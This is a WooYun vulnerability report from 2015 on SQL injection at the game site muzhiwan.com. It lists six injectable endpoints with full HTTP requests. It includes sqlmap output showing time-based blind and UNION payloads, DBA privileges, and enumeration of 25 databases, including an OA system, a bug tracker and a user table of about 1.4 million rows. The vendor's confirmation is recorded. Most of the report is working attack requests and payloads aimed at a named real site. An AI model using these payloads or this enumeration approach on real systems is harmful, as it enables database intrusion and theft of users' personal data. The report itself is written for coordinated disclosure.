当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123877

漏洞标题:拇指玩主站SQL注射涉及大量敏感数据DBA权限(涉及至少140W用户信息)

相关厂商:muzhiwan.com

漏洞作者: 路人甲

提交时间:2015-07-01 13:33

修复时间:2015-08-15 13:38

公开时间:2015-08-15 13:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开

简要描述:

可union

详细说明:

1,www.muzhiwan.com/index.php?action=album&aid=我是注入点&opt=getuserupdate 
2,
POST /index.php?action=developer&opt=getAjaxComment HTTP/1.1
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: www.muzhiwan.com
Cookie: 
Host: www.muzhiwan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
fid=我是注入点&num=1
3,
www.muzhiwan.com/index.php?action=zhuanti&gid=我是注入点&num=2&opt=toupiao
4,
www.muzhiwan.com/index.php?action=article&id=我是注入点&opt=getuserupdate 
5,
www.muzhiwan.com/index.php?action=article&gid=17379&opt=index&type=我是注入点&vid=113639 
6,
POST /index.php?action=album&opt=getAjaxAlbumComment HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: www.muzhiwan.com
Cookie: 
Host: www.muzhiwan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
num=1&vid=我是注入点

漏洞证明:

拿第6个测试:
---
Parameter: vid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: num=1&vid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YKKn)
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: num=1&vid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71706a6a71,0x6d676f665a5a50576772,0x71707a7171)-- 
---
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
current user:    'applanet_user@10.1.1.%'
current user is DBA:    True
available databases [25]:
[*] anquanxia
[*] applanet_user
[*] bug
[*] googleinstall
[*] googlemarket
[*] googlemarketgame
[*] information_schema
[*] muzhiwan
[*] muzhiwan130409
[*] muzhiwan130417
[*] muzhiwanbbs
[*] muzhiwanbbstest
[*] muzhiwantest
[*] mysql
[*] mzw
[*] mzw_new_gz
[*] mzw_oa
[*] mzwtest
[*] redmine
[*] sdk
[*] stat
[*] stat_sdk
[*] test
[*] testlink
[*] wikidatabase
Database: muzhiwan
[67 tables]
+-----------------------------+
| baidu_mtc                   |
| baidutest                   |
| installcount                |
| mzw_ad_agency               |
| mzw_ad_item                 |
| mzw_ad_md5                  |
| mzw_ad_rules                |
| mzw_apkpan_tab              |
| mzw_apppropinfo_tab         |
| mzw_appscoreinfo_tab        |
| mzw_baidubind_tab           |
| mzw_categorydetail_tab      |
| mzw_categorydetail_test     |
| mzw_categoryinfo_tab        |
| mzw_comment_tab             |
| mzw_commentreview_tab       |
| mzw_corp_score_tab          |
| mzw_datapack_tab            |
| mzw_downloadinfo_tab        |
| mzw_feedback_tab            |
| mzw_feedinfo_tab            |
| mzw_feedsfinfo_tab          |
| mzw_filterword_tab          |
| mzw_hotword_tab             |
| mzw_index_tab               |
| mzw_indexmemory             |
| mzw_mobilebrandinfo_tab     |
| mzw_mobiledetailinfo_tab    |
| mzw_mobileindex             |
| mzw_opinion_tab             |
| mzw_outookinfo_tab          |
| mzw_packutils_data          |
| mzw_packutils_error         |
| mzw_packutils_users         |
| mzw_ranklist_tab            |
| mzw_sf_categorydetail_tab   |
| mzw_sf_categoryinfo_tab     |
| mzw_sf_comment_tab          |
| mzw_sf_commentreview_tab    |
| mzw_sf_download_tab         |
| mzw_sf_get_tab              |
| mzw_sf_getcomment_tab       |
| mzw_sf_pan_tab              |
| mzw_sf_scoreinfo_tab        |
| mzw_sf_to_tab               |
| mzw_sf_upload_tab           |
| mzw_sf_user_recommend_tab   |
| mzw_splashinfo_tab          |
| mzw_staticgameinfo          |
| mzw_topiccomment_tab        |
| mzw_topicdetail_tab         |
| mzw_topicinfo_tab           |
| mzw_topicreview_tab         |
| mzw_user_behaviour          |
| mzw_user_cloudpush_tab      |
| mzw_user_download_tab       |
| mzw_user_recommend_tab      |
| mzw_user_record             |
| mzw_user_subjectbind_tab    |
| mzw_user_subjectcomment_tab |
| mzw_user_subjectinfo_tab    |
| mzw_user_subjectreview_tab  |
| mzw_user_subjecttag_tab     |
| mzw_userinfo_tab            |
| mzw_usertag_tab             |
| mzw_wendapost_tab           |
| mzw_wendatopic_tab          |
+-----------------------------+
Database: muzhiwan
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| mzw_staticgameinfo          | 31912349 |
| mzw_usertag_tab             | 2099307 |
| mzw_userinfo_tab            | 1406807 |        140-万
| mzw_comment_tab             | 300143  |
| mzw_baidubind_tab           | 89415   |
| mzw_sf_categorydetail_tab   | 47967   |
| mzw_commentreview_tab       | 24978   |
| mzw_user_cloudpush_tab      | 20680   |
| mzw_sf_pan_tab              | 15718   |
| mzw_mobileindex             | 15368   |
、、、、、、
这个库里面竟然还涉及 OA 信息,BUG 信息。。。。。。
Database: mzw_oa
[40 tables]
+-------------------+
| zt_action         |
| zt_bug            |
| zt_build          |
| zt_burn           |
| zt_case           |
| zt_casestep       |
| zt_company        |
| zt_config         |
| zt_dept           |
| zt_doc            |
| zt_doclib         |
| zt_effort         |
| zt_extension      |
| zt_file           |
| zt_group          |
| zt_grouppriv      |
| zt_history        |
| zt_lang           |
| zt_module         |
| zt_product        |
| zt_productplan    |
| zt_project        |
| zt_projectproduct |
| zt_projectstory   |
| zt_release        |
| zt_story          |
| zt_storyspec      |
| zt_task           |
| zt_taskestimate   |
| zt_team           |
| zt_testresult     |
| zt_testrun        |
| zt_testtask       |
| zt_todo           |
| zt_user           |
| zt_usercontact    |
| zt_usergroup      |
| zt_userquery      |
| zt_usertpl        |
| zt_webapp         |
+-------------------+
Database: bug
[31 tables]
+-----------------------------------+
| mantis_bug_file_table             |
| mantis_bug_history_table          |
| mantis_bug_monitor_table          |
| mantis_bug_relationship_table     |
| mantis_bug_revision_table         |
| mantis_bug_table                  |
| mantis_bug_tag_table              |
| mantis_bug_text_table             |
| mantis_bugnote_table              |
| mantis_bugnote_text_table         |
| mantis_category_table             |
| mantis_config_table               |
| mantis_custom_field_project_table |
| mantis_custom_field_string_table  |
| mantis_custom_field_table         |
| mantis_email_table                |
| mantis_filters_table              |
| mantis_news_table                 |
| mantis_plugin_table               |
| mantis_project_file_table         |
| mantis_project_hierarchy_table    |
| mantis_project_table              |
| mantis_project_user_list_table    |
| mantis_project_version_table      |
| mantis_sponsorship_table          |
| mantis_tag_table                  |
| mantis_tokens_table               |
| mantis_user_pref_table            |
| mantis_user_print_pref_table      |
| mantis_user_profile_table         |
| mantis_user_table                 |
+-----------------------------------+

修复方案:

好好检查下。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-01 13:36

厂商回复:

我们会及时修复。。

最新状态:

暂无